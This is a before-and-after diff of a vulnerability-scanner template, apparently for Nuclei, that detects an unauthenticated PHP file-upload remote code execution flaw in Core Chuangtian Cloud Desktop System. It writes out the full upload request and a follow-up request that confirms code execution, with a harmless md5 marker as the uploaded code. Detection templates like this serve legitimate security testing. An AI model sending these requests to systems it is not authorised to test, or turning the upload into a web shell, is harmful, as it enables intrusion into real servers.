vulnerabilities/other/core-chuangtian-cloud-rce.yaml (before)
id: core-chuangtian-cloud-rce

info:
  name: Core Chuangtian Cloud Desktop System - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: Core Chuangtian Cloud Desktop System is susceptible to remote code execution vulnerabilities.
  reference:
    - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: rce,fileupload,intrusive

requests:
  - raw:
      - |
        POST /Upload/upload_file.php?l=test HTTP/1.1
        Host: {{Hostname}}
        Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
        Accept-Encoding: gzip, deflate
        Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv

        ------WebKitFormBoundaryfcKRltGv
        Content-Disposition: form-data; name="file"; filename="test.php"
        Content-Type: image/avif

        <?php phpinfo(); ?>
        ------WebKitFormBoundaryfcKRltGv--

      - |
        GET /Upload/test/test.php HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "PHP Version")'
          - 'status_code_2 == 200'
        condition: and

# Enhanced by mp on 2022/06/01

vulnerabilities/other/core-chuangtian-cloud-rce.yaml (after)
id: core-chuangtian-cloud-rce

info:
  name: Core Chuangtian Cloud Desktop System - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: Core Chuangtian Cloud Desktop System is susceptible to remote code execution vulnerabilities.
  reference:
    - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: rce,fileupload,intrusive,cloud,chuangtian

requests:
  - raw:
      - |
        POST /Upload/upload_file.php?l=test HTTP/1.1
        Host: {{Hostname}}
        Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8
        Accept-Encoding: gzip, deflate
        Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv

        ------WebKitFormBoundaryfcKRltGv
        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
        Content-Type: image/avif

        <?php echo md5("core-chuangtian-cloud"); ?>
        ------WebKitFormBoundaryfcKRltGv--

      - |
        GET /Upload/test/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "f0a712e2bcf99c5b0c370b3a4286bb35")'
          - 'status_code_2 == 200'
        condition: and

# Enhanced by mp on 2022/06/01

vulnerabilities/other/core-chuangtian-cloud-rce.yaml (diff)
@@ -11,7 +11,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 10.0
     cwe-id: CWE-77
-  tags: rce,fileupload,intrusive
+  tags: rce,fileupload,intrusive,cloud,chuangtian
 
 requests:
   - raw:
@@ -24,21 +24,21 @@ requests:
         Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
 
         ------WebKitFormBoundaryfcKRltGv
-        Content-Disposition: form-data; name="file"; filename="test.php"
+        Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
         Content-Type: image/avif
 
-        <?php phpinfo(); ?>
+        <?php echo md5("core-chuangtian-cloud"); ?>
         ------WebKitFormBoundaryfcKRltGv--
 
       - |
-        GET /Upload/test/test.php HTTP/1.1
+        GET /Upload/test/{{randstr}}.php HTTP/1.1
         Host: {{Hostname}}
 
     req-condition: true
     matchers:
       - type: dsl
         dsl:
-          - 'contains(body_2, "PHP Version")'
+          - 'contains(body_2, "f0a712e2bcf99c5b0c370b3a4286bb35")'
           - 'status_code_2 == 200'
         condition: and
